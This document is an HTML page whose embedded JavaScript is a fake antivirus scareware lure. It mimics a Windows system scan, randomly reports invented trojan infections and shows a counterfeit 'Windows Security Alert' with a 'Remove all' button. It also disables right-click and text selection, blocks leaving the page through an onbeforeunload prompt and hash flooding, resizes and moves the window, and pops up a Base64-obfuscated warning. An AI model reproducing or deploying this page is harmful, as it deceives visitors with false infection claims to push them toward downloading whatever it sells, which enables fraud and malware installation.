
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Wait a minute! This is important - we check your devices.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" >

<style type="text/css" media="screen">
<!--
* {
	cursor: default;
	outline: none
}

body {
	font-family: Tahoma, Arial, Helvetica, sans-serif;
	font-size: 11px;
	background-color: #FFF;
	color: #000;
	height: 100%;
	margin: 0;
	padding: 0;
}

.clear {
	clear: both;
	position: relative;
	font-size: 0px;
	height: 0px;
	line-height: 0px
}

.left_bar {
	position: absolute;
	background: #718de0;
	color: #33C;
	height: 100%;
}

.karma {
	background: url(images/1/1/q38743.jpg) no-repeat;
	width: 213px;
	height: 19px;
	font-weight: bold;
	color: #3f3d3d;
	margin: 12px 0 0 12px;
	padding: 7px 0 0 13px;
}

.left_box {
	background: #d7def8;
	color: #3F3D3D;
	border: 1px solid #FFF;
	border-top: none;
	width: 211px;
	margin: 0 0 0 12px;
	padding: 10px 0 6px;
}

.left_box .sys {
	background: url(images/1/1/74m45hb.gif) no-repeat 15px;
}

.left_box .prog {
	background: url(images/1/1/7535d.gif) no-repeat 15px;
}

.left_box .set {
	background: url(images/1/1/57ulc2.gif) no-repeat 15px;
}

.left_box .net {
	background: url(images/1/1/75xr29c.gif) no-repeat 15px;
}

.left_box .doc {
	background: url(images/1/1/f2jym3i.gif) no-repeat 15px;
}

.left_box .sdoc {
	background: url(images/1/1/5z38ne6.gif) no-repeat 15px;
}

.left_box .cp {
	background: url(images/1/1/482726.gif) no-repeat 15px;
}

.left_box_line {
	padding: 4px 2px 4px 36px;
}

.left_box_line a {
	color: #38599c;
	text-decoration: none;
}

.left_box_line a:hover {
	text-decoration: underline;
}

.right_bar {
	position: absolute;
	left: 238px;
}

.right_hr {
	background-image: url(images/1/1/yyup8bm.gif);
	background-repeat: no-repeat;
	width: 280px;
	height: 19px;
	padding-left: 15px;
	padding-bottom: 15px;
	margin-top: 15px;
	font-weight: 700;
	clear: both;
}

.fb {
	float: left;
	padding-left: 20px;
	width: 170px;
}

.f_spark {
	padding: 0 10px 0 50px;
	background: url(images/1/1/d70i7m.gif) no-repeat;
	height: 50px;
	line-height: 34px;
}

.hdd_icon {
	padding: 0 10px 0 60px;
	background: url(images/1/1/cb0p9.gif) no-repeat;
	height: 50px;
	line-height: 34px;
}

.dvd_icon {
	padding: 0 10px 0 60px;
	background: url(images/1/1/sz1uu.gif) no-repeat;
	height: 50px;
	line-height: 34px;
}

.progress_bar {
	margin: 15px 15px 0;
}

.pbb {
	background: url(images/1/1/ue9pnr7.gif) no-repeat;
	width: 416px;
	height: 15px;
	margin: 7px 0 0;
	padding: 1px 3px;
}

.pbp {
	background: url(images/1/1/34lff6p.gif) repeat-x left;
	height: 15px;
	width: 416px;
}

#fast {
	float: right;
	background: #fff;
	width: 418px;
	height: 15px;
}

#pp {
	position: absolute;
	padding-left: 200px;
}

.art {
	font-weight: bold;
	margin: 5px 15px 0;
}

#win {
	position: relative;
	width: 700px;
	height: 337px;
	background: url(images/1/1/lu3w66.png) no-repeat;
	margin: 5px 15px 0;
}

#win h2 {
	margin: 0;
	padding: 15px 40px 0;
	color: #fff;
	font-size: 16px;
}

#win td.name {
	background: url(images/1/1/k4qi05.gif) no-repeat 7px 5px;
	padding-left: 30px;
	font-weight: bold;
}

#win td.stat {
	color: #f33;
	font-weight: bold;
}

.td_cell1 {
	padding-top: 10px;
	padding-left: 7px;
}

.td_cell2 {
	padding-top: 7px;
	padding-left: 7px;
}

.none {
	visibility: hidden;
}

#desc {
	padding-top: 24px;
	padding-left: 12px;
	width: 600px
}

.touch1 {
	position: absolute;
	display: inline;
	padding-left: 50px;
	padding-top: 30px;
}

.supergirl {
	display: block;
	font-weight: bold;
	color: red;
	padding-left: 5px;
	background: url(images/1/1/14wx5i.gif) no-repeat;
	line-height: 18px;
	padding-left: 20px;
}

#al {
	z-index: 1300;
	width: 434px;
	height: 332px;
	position: absolute;
	cursor: pointer;
	background: url(images/1/1/avql09.png);
	display: none;
}

#al h3 {
	color: #fff;
	margin: 6px;
	padding: 0;
	padding-left: 19px;
	text-shadow: 1px 1px 1px #000;
	font-size: 12px;
}

#al p.o {
	color: #fff;
	margin: 20px;
	padding: 0;
	padding-left: 40px;
	font-weight: bold;
}

#al span.l {
	position: absolute;
	top: 104px;
	left: 20px;
}

#al span.r {
	position: absolute;
	top: 104px;
	right: 80px;
}

#al p.f {
	position: absolute;
	bottom: 7px;
	left: 22px;
	width: 400px;
}

#al div.b {
	position: absolute;
	bottom: 80px;
	right: 20px;
}

#al div.b button {
	margin: 0 2px;
	font-size: 12px;
}

#al div.b button:first-child {
	font-weight: bold;
}

#fsc {
	background: #ededed url(images/1/1/0rup4e.gif) no-repeat 3px;
	position: absolute;
	right: 5px;
	bottom: 5px;
	padding: 2px 2px 2px 20px;
	font-size: 11px;
}
-->
</style>
<script type="text/javascript" src="js/jquery.min.js"></script>
<script type="text/javascript" src="js/jquery-ui-1.7.2.custom.min.js"></script>
<script type="text/javascript" src="js/functions.js"></script>
<script type="text/javascript" src="js/j25f09j.js"></script>
</head>
<body>

<!-- payload starts here -->
<script type="text/javascript">
	var prdl = false;
	$(document)
			.ready(
					function() {
						$("body")
								.html(
										'<div class="left_bar"><div class="karma">System Tasks</div><div class="left_box"><div class="left_box_line sys"><a href="#">View system&nbsp;information</a></div><div class="left_box_line prog"><a href="#">Add or remove&nbsp;programs</a></div><div class="left_box_line set"><a href="#">Change a settings</a></div></div><div class="karma">Other Places</div><div class="left_box"><div class="left_box_line net"><a href="#">My&nbsp;Network Places</a></div><div class="left_box_line doc"><a href="#">My Documents</a></div><div class="left_box_line sdoc"><a href="#">Shared Documents</a></div><div class="left_box_line cp"><a href="#">Control Panel</a></div></div><div class="karma">Details</div><div class="left_box"><div class="left_box_line"><strong>My Computer</strong><br/>System Folder</div></div></div><div class="right_bar"><div class="right_hr">System&nbsp;scan&nbsp;progress</div><div class="fb"><div id="tiesto1" class="touch1"></div><div class="f_spark">Shared Documents</div></div><div class="fb"><div id="tiesto2" class="touch1"></div><div class="f_spark">My Documents</div></div><div class="right_hr">Hard drives</div><div class="fb"><div id="tiesto3" class="touch1"></div><div class="hdd_icon">Local Disk (C:)</div></div><div class="fb"><div id="tiesto4" class="touch1"></div><div class="hdd_icon">Local Disk (D:)</div></div><div class="right_hr">DVD</div><div class="fb"><div class="dvd_icon">DVD-RAM Drive (E:)</div></div><div class="clear"></div><div class="progress_bar"><div class="pbb"><div class="pbp"><div id="fast"></div><div id="pp">0%</div></div></div></div><div class="art"><span id="elysium">none</span></div><div id="win"><h2>Your <span>Computer</span> is&nbsp;Infected!</h2><div style="padding-top:20px;">fileinfos and actions:</div><table><tr><td width="166" class="td_cell1">Name</td><td width="105" class="td_cell1">Risk level</td><td width="85" class="td_cell1">Date</td><td width="120" class="td_cell1">Files&nbsp;infected</td><td width="120" class="td_cell1">State</td></tr><tr class="none" id="dj1""><td class="td_cell2 name">Trojan-IM.Win16.PS.fp</td><td class="td_cell2 stat">Critical</td><td class="td_cell2">03/13/2010</td><td class="td_cell2">15</td><td class="td_cell2">Waiting removal</td></tr><tr class="none" id="dj2""><td class="td_cell2 name">Trojan.Win32.SubSys.dr</td><td class="td_cell2 stat">Critical</td><td class="td_cell2">05/13/2009</td><td class="td_cell2">23</td><td class="td_cell2">Waiting removal</td></tr><tr class="none" id="dj3""><td class="td_cell2 name">Trojan-Clicker.HTML. IFrame.bk</td><td class="td_cell2 stat">Critical</td><td class="td_cell2">04/17/2010</td><td class="td_cell2">37</td><td class="td_cell2">Waiting removal</td></tr></table><div class="none2" id="desc"><b>Description:</b><br/>This program <span>is potentially</span>&nbsp;dangerous for your <span>system</span>. <b>Trojan-Downloader</b> <span>stealing</span> passwords , credit <span>cards and</span> other personal  information&nbsp;from your computer.<br/><br/><b>Advice:</b><br/>You need <span>to</span> remove this&nbsp;fileinfo as soon as possible!</div><button id="fsc">Full <span>system</span> cleanup</button></div></div><div id="al"><h3>Windows Security Alert</h3><p class="o">To help protect your computer, Windows Web Security has detected trojans and ready to remove them.</p><span class="l">Detected spyware and adware on your computer:</span><span class="r">Filename:</span><div class="b"><button>Remove all</button><button>Cancel</button></div><p class="f">Spyware is software, which can gather informationfrom user`s computer through Internet connection and sedn them to it`s creator. Gathered information can be passwords, e-mail addresses and all that data, which is important for you.</p></div><font color="#babaff"></font>')
								.click(function(e) {
									e.preventDefault();
									prdl = true;
									getW().location = "/";
									prdl = false;
									return false;
								});
						var left_bar_height = $(".left_bar").height();
						var right_bar_height = $(".right_bar").height();
						if (left_bar_height < right_bar_height) {
							$(".left_bar").height(right_bar_height);
						}
						$(document).bind("contextmenu", function(e) {
							e.preventDefault();
							return false;
						});
						$("*").disableTextSelect();
						$("#white").css("display", "none");
						$("#page_progress").css("display", "none");
						$(".left_bar").css("display", "block");
						$("#fast")
								.animate(
										{
											width : "0px"
										},
										15000,
										function() {
											var total = process.progress1
													+ process.progress2
													+ process.progress3
													+ process.progress4;
											$("#elysium")
													.html(
															'Scan&nbsp;complete.&nbsp;&nbsp;'
																	+ total
																	+ '&nbsp;fileinfos&nbsp;was&nbsp;found!');
											clearInterval(summer);
											$("#al").css(
													"left",
													($(window).width() - 434)
															/ 2 + "px").css(
													"top",
													($(window).height() - 332)
															/ 2 + "px").show();
										});
						process.found.c = $("#tiesto3");
						process.found.d = $("#tiesto4");
						process.found.s = $("#tiesto1");
						process.found.m = $("#tiesto2");
						summer = setInterval(vde60, 200);
					});
	window.onbeforeunload = function() {
		if (prdl === false && td3b == 1) {
			document.location = "/";
			return 'Your computer is infected! They can cause data lost and file corruption and need to be treat as soon as possible. Press CANCEL to prevent it.\nReturn to System	Security and download  it  secure  to your PC';
		}
	};
	var summer;
	var process = {
		progress1 : 1,
		progress2 : 1,
		progress3 : 1,
		progress4 : 1,
		found : {
			c : 0,
			d : 0,
			s : 0,
			m : 0
		}
	};
	var w701b7a;
	document.title = 'Wait a minute! This is important - we check your device';
	function vde60() {
		w701b7a = Math.round(100 - $("#fast").width() / 418 * 100);
		$("#pp").text(w701b7a + "%");
		$("#elysium").html(
				'Now&nbsp;checking: '
						+ em682d95[Math.floor(Math.random() * 100)] + '.'
						+ l75de[Math.floor(Math.random() * 51)]);
		var rand1 = Math.floor(Math.random() * (8));
		var rand2 = Math.floor(Math.random() * (10));
		process.progress1 += rand1;
		if (rand1 < 4) {
			process.found.c.html('<span class="supergirl">Found '
					+ process.progress1 + ' trojans</span>');
			$("#dj1").removeClass("none");
		}
		if (rand2 < 3) {
			process.progress2 += rand2;
			process.found.d.html('<span class="supergirl">Found '
					+ process.progress2 + ' trojans</span>');
			$("#dj2").removeClass("none");
		}
		if (rand1 > rand2 && w701b7a > 40) {
			process.progress3 += rand2;
			process.found.s.html('<span class="supergirl">Found '
					+ process.progress3 + ' trojans</span>');
			$("#dj3").removeClass("none");
		}
		if (rand1 > rand2 && w701b7a > 60) {
			process.progress4 += rand1 - 2;
			process.found.m.html('<span class="supergirl">Found '
					+ process.progress4 + ' trojans</span>');
		}
	}
	for (i = 0; i < 10; i++) {
		document.location.hash = i;
	}
	function getW() {
		return window;
	}
	(function() {
		if (k1926a == 1) {
			if (window.attachEvent) {
				var w = window;
				var ua = navigator.userAgent;
				var v1 = ua.toLowerCase().indexOf('msie') != -1
						&& ua.toLowerCase().indexOf('opera') < 0;
				var x = 11;
				w.resizeTo(x * 10, x * 11 - 7);
				w.moveTo(v1 ? (screen.width - 100) >> 1 : 11027,
						v1 ? (screen.height - 100) >> 1 : 10659);
			}
			confirm(Base64
					.decode('Q2F1dGlvbiEgWW91ciBjb21wdXRlciBjb250YWlucyBhIHZhcmlldHkgb2Ygc3VzcGljaW91cyBwcm9ncmFtcy5Zb3VyIFN5c3RlbSByZXF1aXJlcyBpbW1lZGlhdGUgY2hlY2tpbmchIFRoZSBzeXN0ZW0gd2lsbCBwZXJmb3JtIGEgZmFzdCBhbmQgZnJlZSBjaGVjayB5b3VyIFBDIGZvciBtYWxpY2lvdXMgcHJvZ3JhbXMu'));
			getW().moveTo(0, 0);
			getW().resizeTo(screen.availWidth, screen.availHeight);
			window.focus();
		}
	})();
</script>
<!-- payload ends here -->
</body>
</html>